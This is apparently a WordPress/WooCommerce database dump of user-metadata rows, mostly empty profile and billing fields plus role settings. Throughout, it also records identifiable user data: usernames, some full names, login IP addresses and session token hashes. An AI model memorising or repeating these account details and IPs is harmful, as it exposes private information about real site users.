INSERT INTO `wp_usermeta` VALUES (2265, 94, 'googleplus', ''); 
INSERT INTO `wp_usermeta` VALUES (2266, 94, 'twitter', ''); 
INSERT INTO `wp_usermeta` VALUES (2267, 94, 'facebook', ''); 
INSERT INTO `wp_usermeta` VALUES (2268, 94, 'last_update', '1477486286'); 
INSERT INTO `wp_usermeta` VALUES (2269, 95, 'wpseo_title', ''); 
INSERT INTO `wp_usermeta` VALUES (2270, 95, 'wpseo_metadesc', ''); 
INSERT INTO `wp_usermeta` VALUES (2271, 95, 'wpseo_metakey', ''); 
INSERT INTO `wp_usermeta` VALUES (2272, 95, 'wpseo_excludeauthorsitemap', ''); 
INSERT INTO `wp_usermeta` VALUES (2273, 95, 'wpseo_content_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (2274, 95, 'wpseo_keyword_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (2275, 95, 'billing_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2276, 95, 'billing_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2277, 95, 'billing_company', ''); 
INSERT INTO `wp_usermeta` VALUES (2278, 95, 'billing_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (2279, 95, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (2280, 95, 'billing_city', ''); 
INSERT INTO `wp_usermeta` VALUES (2281, 95, 'billing_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (2282, 95, 'billing_country', ''); 
INSERT INTO `wp_usermeta` VALUES (2283, 95, 'billing_state', ''); 
INSERT INTO `wp_usermeta` VALUES (2284, 95, 'billing_phone', ''); 
INSERT INTO `wp_usermeta` VALUES (2285, 95, 'billing_email', ''); 
INSERT INTO `wp_usermeta` VALUES (2286, 95, 'shipping_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2287, 95, 'shipping_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2288, 95, 'shipping_company', ''); 
INSERT INTO `wp_usermeta` VALUES (2289, 95, 'shipping_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (2290, 95, 'shipping_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (2291, 95, 'shipping_city', ''); 
INSERT INTO `wp_usermeta` VALUES (2292, 95, 'shipping_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (2293, 95, 'shipping_country', ''); 
INSERT INTO `wp_usermeta` VALUES (2294, 95, 'shipping_state', ''); 
INSERT INTO `wp_usermeta` VALUES (2295, 95, 'googleplus', ''); 
INSERT INTO `wp_usermeta` VALUES (2296, 95, 'twitter', ''); 
INSERT INTO `wp_usermeta` VALUES (2297, 95, 'facebook', ''); 
INSERT INTO `wp_usermeta` VALUES (2298, 95, 'last_update', '1477486324'); 
INSERT INTO `wp_usermeta` VALUES (2299, 96, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2300, 94, 'session_tokens', 'a:2:{s:64:"0a185c4ba662ad09a006c4fc4b146b778d819357017e0fa203845750ecf4170c";a:4:{s:10:"expiration";i:1482355749;s:2:"ip";s:13:"50.151.36.144";s:2:"ua";s:113:"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";s:5:"login";i:1482182949;}s:64:"5ce024c8b60efa43c9951c53bb4bae3ff5bf362b2f1daafcd326d47c4d2014b0";a:4:{s:10:"expiration";i:1482355826;s:2:"ip";s:13:"50.151.36.144";s:2:"ua";s:113:"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";s:5:"login";i:1482183026;}}'); 
INSERT INTO `wp_usermeta` VALUES (2301, 120, 'nickname', 'bernard.roberts'); 
INSERT INTO `wp_usermeta` VALUES (2302, 120, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2303, 120, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2304, 120, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2305, 120, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2306, 120, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2307, 120, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2308, 120, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2309, 120, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2310, 120, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2311, 120, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2312, 120, '_yoast_wpseo_profile_updated', '1477494466'); 
INSERT INTO `wp_usermeta` VALUES (2313, 120, 'session_tokens', 'a:1:{s:64:"9d94bd43d746a7f3178d86483b488f2722f3591c47ebb2a9cbf58f9b1a7a8a02";a:4:{s:10:"expiration";i:1478703099;s:2:"ip";s:11:"130.76.24.9";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1477493499;}}'); 
INSERT INTO `wp_usermeta` VALUES (2314, 120, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2315, 120, 'wpseo_title', ''); 
INSERT INTO `wp_usermeta` VALUES (2316, 120, 'wpseo_metadesc', ''); 
INSERT INTO `wp_usermeta` VALUES (2317, 120, 'wpseo_metakey', ''); 
INSERT INTO `wp_usermeta` VALUES (2318, 120, 'wpseo_excludeauthorsitemap', ''); 
INSERT INTO `wp_usermeta` VALUES (2319, 120, 'wpseo_content_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (2320, 120, 'wpseo_keyword_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (2321, 120, 'billing_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2322, 120, 'billing_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2323, 120, 'billing_company', ''); 
INSERT INTO `wp_usermeta` VALUES (2324, 120, 'billing_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (2325, 120, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (2326, 120, 'billing_city', ''); 
INSERT INTO `wp_usermeta` VALUES (2327, 120, 'billing_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (2328, 120, 'billing_country', ''); 
INSERT INTO `wp_usermeta` VALUES (2329, 120, 'billing_state', ''); 
INSERT INTO `wp_usermeta` VALUES (2330, 120, 'billing_phone', ''); 
INSERT INTO `wp_usermeta` VALUES (2331, 120, 'billing_email', ''); 
INSERT INTO `wp_usermeta` VALUES (2332, 120, 'shipping_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2333, 120, 'shipping_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2334, 120, 'shipping_company', ''); 
INSERT INTO `wp_usermeta` VALUES (2335, 120, 'shipping_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (2336, 120, 'shipping_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (2337, 120, 'shipping_city', ''); 
INSERT INTO `wp_usermeta` VALUES (2338, 120, 'shipping_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (2339, 120, 'shipping_country', ''); 
INSERT INTO `wp_usermeta` VALUES (2340, 120, 'shipping_state', ''); 
INSERT INTO `wp_usermeta` VALUES (2341, 120, 'googleplus', ''); 
INSERT INTO `wp_usermeta` VALUES (2342, 120, 'twitter', ''); 
INSERT INTO `wp_usermeta` VALUES (2343, 120, 'facebook', ''); 
INSERT INTO `wp_usermeta` VALUES (2344, 120, 'last_update', '1477494466'); 
INSERT INTO `wp_usermeta` VALUES (2349, 96, 'wpseo_title', ''); 
INSERT INTO `wp_usermeta` VALUES (2350, 96, 'wpseo_metadesc', ''); 
INSERT INTO `wp_usermeta` VALUES (2351, 96, 'wpseo_metakey', ''); 
INSERT INTO `wp_usermeta` VALUES (2352, 96, 'wpseo_excludeauthorsitemap', ''); 
INSERT INTO `wp_usermeta` VALUES (2353, 96, 'wpseo_content_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (2354, 96, 'wpseo_keyword_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (2355, 96, 'billing_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2356, 96, 'billing_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2357, 96, 'billing_company', ''); 
INSERT INTO `wp_usermeta` VALUES (2358, 96, 'billing_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (2359, 96, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (2360, 96, 'billing_city', ''); 
INSERT INTO `wp_usermeta` VALUES (2361, 96, 'billing_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (2362, 96, 'billing_country', ''); 
INSERT INTO `wp_usermeta` VALUES (2363, 96, 'billing_state', ''); 
INSERT INTO `wp_usermeta` VALUES (2364, 96, 'billing_phone', ''); 
INSERT INTO `wp_usermeta` VALUES (2365, 96, 'billing_email', ''); 
INSERT INTO `wp_usermeta` VALUES (2366, 96, 'shipping_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2367, 96, 'shipping_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2368, 96, 'shipping_company', ''); 
INSERT INTO `wp_usermeta` VALUES (2369, 96, 'shipping_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (2370, 96, 'shipping_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (2371, 96, 'shipping_city', ''); 
INSERT INTO `wp_usermeta` VALUES (2372, 96, 'shipping_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (2373, 96, 'shipping_country', ''); 
INSERT INTO `wp_usermeta` VALUES (2374, 96, 'shipping_state', ''); 
INSERT INTO `wp_usermeta` VALUES (2375, 96, 'googleplus', ''); 
INSERT INTO `wp_usermeta` VALUES (2376, 96, 'twitter', ''); 
INSERT INTO `wp_usermeta` VALUES (2377, 96, 'facebook', ''); 
INSERT INTO `wp_usermeta` VALUES (2378, 96, 'last_update', '1477496586'); 
INSERT INTO `wp_usermeta` VALUES (2379, 96, 'session_tokens', 'a:1:{s:64:"b36637e0c367fb2bd5e39dfe9e635ec6c62d05e163dc5d4f33e03476f0bb1961";a:4:{s:10:"expiration";i:1480706644;s:2:"ip";s:13:"50.151.36.144";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36";s:5:"login";i:1479497044;}}'); 
INSERT INTO `wp_usermeta` VALUES (2380, 121, 'nickname', 'fred.cummings'); 
INSERT INTO `wp_usermeta` VALUES (2381, 121, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2382, 121, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2383, 121, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2384, 121, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2385, 121, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2386, 121, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2387, 121, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2388, 121, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2389, 121, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2390, 121, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2391, 121, '_yoast_wpseo_profile_updated', '1477515444'); 
INSERT INTO `wp_usermeta` VALUES (2392, 121, 'session_tokens', 'a:1:{s:64:"b3ce74a1a0f45dda21282b913d447b37c1935ade5242ce75b3908e06562f71d0";a:4:{s:10:"expiration";i:1478725044;s:2:"ip";s:14:"50.206.192.196";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";s:5:"login";i:1477515444;}}'); 
INSERT INTO `wp_usermeta` VALUES (2393, 121, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2394, 122, 'nickname', 'nicolae'); 
INSERT INTO `wp_usermeta` VALUES (2395, 122, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2396, 122, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2397, 122, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2398, 122, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2399, 122, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2400, 122, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2401, 122, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2402, 122, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2403, 122, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2404, 122, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2405, 122, '_yoast_wpseo_profile_updated', '1477572297'); 
INSERT INTO `wp_usermeta` VALUES (2406, 122, 'session_tokens', 'a:1:{s:64:"21174588db5f08beef8b0e1580b71faeeb952961e55818403603f4865eabda2f";a:4:{s:10:"expiration";i:1478781898;s:2:"ip";s:13:"205.254.147.8";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36";s:5:"login";i:1477572298;}}'); 
INSERT INTO `wp_usermeta` VALUES (2407, 122, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2408, 123, 'nickname', 'antonio.quintero'); 
INSERT INTO `wp_usermeta` VALUES (2409, 123, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2410, 123, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2411, 123, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2412, 123, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2413, 123, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2414, 123, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2415, 123, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2416, 123, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2417, 123, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2418, 123, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2419, 123, '_yoast_wpseo_profile_updated', '1477575837'); 
INSERT INTO `wp_usermeta` VALUES (2420, 123, 'session_tokens', 'a:1:{s:64:"6b5aa59d33b6bd64777a9430548449a7acc0447035f50043d518b1dbdeb5bb65";a:4:{s:10:"expiration";i:1478785437;s:2:"ip";s:13:"200.76.153.50";s:2:"ua";s:101:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36";s:5:"login";i:1477575837;}}'); 
INSERT INTO `wp_usermeta` VALUES (2421, 123, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2422, 124, 'nickname', 'ronesti'); 
INSERT INTO `wp_usermeta` VALUES (2423, 124, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2424, 124, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2425, 124, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2426, 124, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2427, 124, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2428, 124, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2429, 124, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2430, 124, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2431, 124, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2432, 124, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2433, 124, '_yoast_wpseo_profile_updated', '1477578087'); 
INSERT INTO `wp_usermeta` VALUES (2434, 124, 'session_tokens', 'a:1:{s:64:"09d882278bf5baa88eaf8dd88ce71a3fb2b768fd0df8aecd5ac946264269605b";a:4:{s:10:"expiration";i:1478787688;s:2:"ip";s:13:"98.100.36.130";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36";s:5:"login";i:1477578088;}}'); 
INSERT INTO `wp_usermeta` VALUES (2435, 124, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2436, 125, 'nickname', 'vrusso'); 
INSERT INTO `wp_usermeta` VALUES (2437, 125, 'first_name', 'veronica'); 
INSERT INTO `wp_usermeta` VALUES (2438, 125, 'last_name', 'russo'); 
INSERT INTO `wp_usermeta` VALUES (2439, 125, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2440, 125, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2441, 125, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2442, 125, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2443, 125, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2444, 125, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2445, 125, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2446, 125, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2447, 125, '_yoast_wpseo_profile_updated', '1477588054'); 
INSERT INTO `wp_usermeta` VALUES (2448, 125, 'session_tokens', 'a:1:{s:64:"0c54f95502acc3713e83f66897ae0d8e8a07039ebef8b9f92b6b70671bd26df6";a:4:{s:10:"expiration";i:1478797654;s:2:"ip";s:13:"64.140.215.24";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36";s:5:"login";i:1477588054;}}'); 
INSERT INTO `wp_usermeta` VALUES (2449, 125, 'last_update', '1477588096'); 
INSERT INTO `wp_usermeta` VALUES (2450, 125, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2451, 94, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2452, 126, 'nickname', 'jrosenfelt'); 
INSERT INTO `wp_usermeta` VALUES (2453, 126, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2454, 126, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2455, 126, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2456, 126, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2457, 126, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2458, 126, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2459, 126, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2460, 126, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2461, 126, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2462, 126, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2463, 126, '_yoast_wpseo_profile_updated', '1477603631'); 
INSERT INTO `wp_usermeta` VALUES (2464, 126, 'session_tokens', 'a:1:{s:64:"adb8a5ee3d52facee10c8bcd9051857ffffebad95bca5f1343a08e39b78fed74";a:4:{s:10:"expiration";i:1478813231;s:2:"ip";s:11:"76.191.72.1";s:2:"ua";s:76:"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko";s:5:"login";i:1477603631;}}'); 
INSERT INTO `wp_usermeta` VALUES (2465, 127, 'nickname', 'jeffh'); 
INSERT INTO `wp_usermeta` VALUES (2466, 127, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2467, 127, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2468, 127, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2469, 127, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2470, 127, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2471, 127, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2472, 127, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2473, 127, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2474, 127, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2475, 127, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2476, 127, '_yoast_wpseo_profile_updated', '1477678718'); 
INSERT INTO `wp_usermeta` VALUES (2477, 127, 'session_tokens', 'a:1:{s:64:"adce64eed286adc5dc998f969cedd3c509b2c329e8a7b638c3736027ffc82ca8";a:4:{s:10:"expiration";i:1478888319;s:2:"ip";s:13:"73.202.218.67";s:2:"ua";s:113:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36";s:5:"login";i:1477678719;}}'); 
INSERT INTO `wp_usermeta` VALUES (2478, 127, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2479, 128, 'nickname', 'sillogon82'); 
INSERT INTO `wp_usermeta` VALUES (2480, 128, 'first_name', 'Silvia'); 
INSERT INTO `wp_usermeta` VALUES (2481, 128, 'last_name', 'Lozano'); 
INSERT INTO `wp_usermeta` VALUES (2482, 128, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2483, 128, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2484, 128, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2485, 128, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2486, 128, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2487, 128, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2488, 128, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2489, 128, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2490, 128, '_yoast_wpseo_profile_updated', '1477899168'); 
INSERT INTO `wp_usermeta` VALUES (2491, 128, 'session_tokens', 'a:1:{s:64:"4319be44752828af9303b79d8389102941d92a1d454acc61f20e8e7e5fd4ca44";a:4:{s:10:"expiration";i:1479108769;s:2:"ip";s:12:"84.126.4.215";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36";s:5:"login";i:1477899169;}}'); 
INSERT INTO `wp_usermeta` VALUES (2492, 128, 'last_update', '1477899217'); 
INSERT INTO `wp_usermeta` VALUES (2493, 128, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2494, 129, 'nickname', 'chipsrv'); 
INSERT INTO `wp_usermeta` VALUES (2495, 129, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2496, 129, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2497, 129, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2498, 129, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2499, 129, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2500, 129, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2501, 129, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2502, 129, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2503, 129, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2504, 129, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2505, 129, '_yoast_wpseo_profile_updated', '1477921378'); 
INSERT INTO `wp_usermeta` VALUES (2506, 129, 'session_tokens', 'a:1:{s:64:"a8d8536880d32416433cb4e3cb0832efcd58bf6311e3e30aef94f186bb37f08f";a:4:{s:10:"expiration";i:1479130978;s:2:"ip";s:11:"132.3.45.80";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1477921378;}}'); 
INSERT INTO `wp_usermeta` VALUES (2507, 130, 'nickname', 'tolparts'); 
INSERT INTO `wp_usermeta` VALUES (2508, 130, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2509, 130, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2510, 130, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2511, 130, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2512, 130, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2513, 130, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2514, 130, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2515, 130, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2516, 130, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2517, 130, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2518, 130, '_yoast_wpseo_profile_updated', '1477934562'); 
INSERT INTO `wp_usermeta` VALUES (2519, 130, 'session_tokens', 'a:1:{s:64:"5e15c78ce673e8c718bd6825aa34d823d2ae83a070dfb32b8821d35e81184669";a:4:{s:10:"expiration";i:1479144162;s:2:"ip";s:12:"24.52.98.190";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36";s:5:"login";i:1477934562;}}'); 
INSERT INTO `wp_usermeta` VALUES (2520, 130, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2521, 131, 'nickname', 'phernandez'); 
INSERT INTO `wp_usermeta` VALUES (2522, 131, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2523, 131, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2524, 131, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2525, 131, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2526, 131, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2527, 131, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2528, 131, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2529, 131, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2530, 131, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2531, 131, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2532, 131, '_yoast_wpseo_profile_updated', '1477940171'); 
INSERT INTO `wp_usermeta` VALUES (2535, 131, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2536, 132, 'nickname', 'pantree'); 
INSERT INTO `wp_usermeta` VALUES (2537, 132, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2538, 132, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2539, 132, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2540, 132, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2541, 132, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2542, 132, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2543, 132, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2544, 132, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2545, 132, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2546, 132, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2547, 132, '_yoast_wpseo_profile_updated', '1477961582'); 
INSERT INTO `wp_usermeta` VALUES (2549, 133, 'nickname', 'george.leon.4'); 
